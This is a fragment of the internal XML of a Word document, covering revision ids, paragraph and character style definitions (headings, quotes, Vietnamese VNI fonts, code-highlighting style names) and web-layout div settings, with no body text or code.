    <w:rsid w:val="00346236"/>
    <w:rsid w:val="0035312C"/>
    <w:rsid w:val="003B4883"/>
    <w:rsid w:val="003C1139"/>
    <w:rsid w:val="003F64B3"/>
    <w:rsid w:val="00402EB8"/>
    <w:rsid w:val="004853B8"/>
    <w:rsid w:val="004B167F"/>
    <w:rsid w:val="004B6B34"/>
    <w:rsid w:val="004F6E92"/>
    <w:rsid w:val="00507C4D"/>
    <w:rsid w:val="005170A5"/>
    <w:rsid w:val="00566F4A"/>
    <w:rsid w:val="005810C8"/>
    <w:rsid w:val="005863A8"/>
    <w:rsid w:val="005A1DF7"/>
    <w:rsid w:val="005D636D"/>
    <w:rsid w:val="00610C42"/>
    <w:rsid w:val="0062064A"/>
    <w:rsid w:val="006343B6"/>
    <w:rsid w:val="00634925"/>
    <w:rsid w:val="00641610"/>
    <w:rsid w:val="00664C42"/>
    <w:rsid w:val="006C02C6"/>
    <w:rsid w:val="006C1FF0"/>
    <w:rsid w:val="006D18D1"/>
    <w:rsid w:val="006D4747"/>
    <w:rsid w:val="006F0109"/>
    <w:rsid w:val="00722CC6"/>
    <w:rsid w:val="007260EE"/>
    <w:rsid w:val="00745BF4"/>
    <w:rsid w:val="00793F2B"/>
    <w:rsid w:val="007F751D"/>
    <w:rsid w:val="00853F15"/>
    <w:rsid w:val="008547A0"/>
    <w:rsid w:val="008575E6"/>
    <w:rsid w:val="0087155E"/>
    <w:rsid w:val="00873358"/>
    <w:rsid w:val="00892E2B"/>
    <w:rsid w:val="0089567F"/>
    <w:rsid w:val="00895EF4"/>
    <w:rsid w:val="008A5948"/>
    <w:rsid w:val="008C21BD"/>
    <w:rsid w:val="008C4C46"/>
    <w:rsid w:val="008F7C14"/>
    <w:rsid w:val="009A0FA8"/>
    <w:rsid w:val="009B34BE"/>
    <w:rsid w:val="009F5416"/>
    <w:rsid w:val="00A16336"/>
    <w:rsid w:val="00A57FD3"/>
    <w:rsid w:val="00A629D5"/>
    <w:rsid w:val="00A641FF"/>
    <w:rsid w:val="00A64A9B"/>
    <w:rsid w:val="00A707DC"/>
    <w:rsid w:val="00A80AC8"/>
    <w:rsid w:val="00AA2FA3"/>
    <w:rsid w:val="00B715FC"/>
    <w:rsid w:val="00BC579C"/>
    <w:rsid w:val="00BD5D83"/>
    <w:rsid w:val="00C17476"/>
    <w:rsid w:val="00C30DDC"/>
    <w:rsid w:val="00C35EB3"/>
    <w:rsid w:val="00C46DD1"/>
    <w:rsid w:val="00C55D1E"/>
    <w:rsid w:val="00C91079"/>
    <w:rsid w:val="00C93CC5"/>
    <w:rsid w:val="00CC4AAA"/>
    <w:rsid w:val="00CD49A4"/>
    <w:rsid w:val="00CD6D69"/>
    <w:rsid w:val="00CF41B1"/>
    <w:rsid w:val="00D020D3"/>
    <w:rsid w:val="00D15450"/>
    <w:rsid w:val="00D34FE1"/>
    <w:rsid w:val="00D729FB"/>
    <w:rsid w:val="00D8163B"/>
    <w:rsid w:val="00D95D95"/>
    <w:rsid w:val="00DA6742"/>
    <w:rsid w:val="00DA675D"/>
    <w:rsid w:val="00DB4629"/>
    <w:rsid w:val="00DB67A2"/>
    <w:rsid w:val="00DC72D5"/>
    <w:rsid w:val="00DD3D48"/>
    <w:rsid w:val="00DD4671"/>
    <w:rsid w:val="00E132BC"/>
    <w:rsid w:val="00E272E2"/>
    <w:rsid w:val="00E47327"/>
    <w:rsid w:val="00E5227D"/>
    <w:rsid w:val="00E56D5A"/>
    <w:rsid w:val="00E639DA"/>
    <w:rsid w:val="00E64AC0"/>
    <w:rsid w:val="00EC6360"/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rsid w:val="00ED56FE"/>
    <w:rsid w:val="00F32045"/>
    <w:rsid w:val="00F8120A"/>
    <w:rsid w:val="00FA0F98"/>
    <w:rsid w:val="00FB444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3EB5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0073CF1B-684E-9B40-AA73-1FC39623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before="120"/>
        <w:ind w:left="108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BEF"/>
    <w:rPr>
      <w:rFonts w:ascii="VNI-Times" w:hAnsi="VNI-Times"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:pPr>
      <w:keepNext/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="VNI-Goudy" w:hAnsi="VNI-Goudy"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:pPr>
      <w:keepNext/>
      <w:ind w:left="2880"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="VNI-Goudy" w:hAnsi="VNI-Goudy"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:pPr>
      <w:keepNext/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="VNI-Goudy" w:hAnsi="VNI-Goudy"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:pPr>
      <w:keepNext/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:pPr>
      <w:keepNext/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F3763"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading7Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading8Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:color w:val="404040"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading9Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>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C7BEF"/>
    <w:rPr>
      <w:rFonts w:ascii="VNI-Goudy" w:hAnsi="VNI-Goudy"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:rFonts w:ascii="VNI-Goudy" w:hAnsi="VNI-Goudy"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:rFonts w:ascii="VNI-Goudy" w:hAnsi="VNI-Goudy"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:rFonts w:ascii="VNI-Times" w:hAnsi="VNI-Times"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:rFonts w:ascii="VNI-Times" w:hAnsi="VNI-Times"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F3763"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="005170A5"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="8" w:space="4" w:color="4472C4"/>
      </w:pBdr>
      <w:spacing w:after="300"/>
      <w:ind w:left="720" w:firstLine="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:color w:val="323E4F"/>
      <w:spacing w:val="5"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="005170A5"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="323E4F"/>
      <w:spacing w:val="5"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4472C4"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:link w:val="Subtitle"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4472C4"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="005170A5"/>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:rFonts w:ascii="VNI-Times" w:hAnsi="VNI-Times"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="4" w:color="4472C4"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="280"/>
      <w:ind w:left="936" w:right="936"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4472C4"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="IntenseQuoteChar">
    <w:name w:val="Intense Quote Char"/>
    <w:link w:val="IntenseQuote"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:rFonts w:ascii="VNI-Times" w:hAnsi="VNI-Times"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4472C4"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4472C4"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleReference">
    <w:name w:val="Subtle Reference"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="ED7D31"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="ED7D31"/>
      <w:spacing w:val="5"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="00EC7BEF"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="GLBT">
    <w:name w:val="GLBT"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:qFormat/>
    <w:rsid w:val="001E580E"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:ind w:left="1080" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00D15450"/>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5948"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008A5948"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CC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firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP" w:bidi="th-TH"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00CC4AAA"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:lang w:eastAsia="ja-JP" w:bidi="th-TH"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003C1139"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-pds">
    <w:name w:val="pl-pds"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003C1139"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c">
    <w:name w:val="pl-c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003C1139"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003C1139"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-smi">
    <w:name w:val="pl-smi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003C1139"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-cce">
    <w:name w:val="pl-cce"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E56D5A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s1">
    <w:name w:val="pl-s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E75CC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E7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95445">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1211191809">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1401830042">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="270628271">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="15971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18068">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="381558821">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="407459361">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="424499223">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="469130960">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="586113998">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
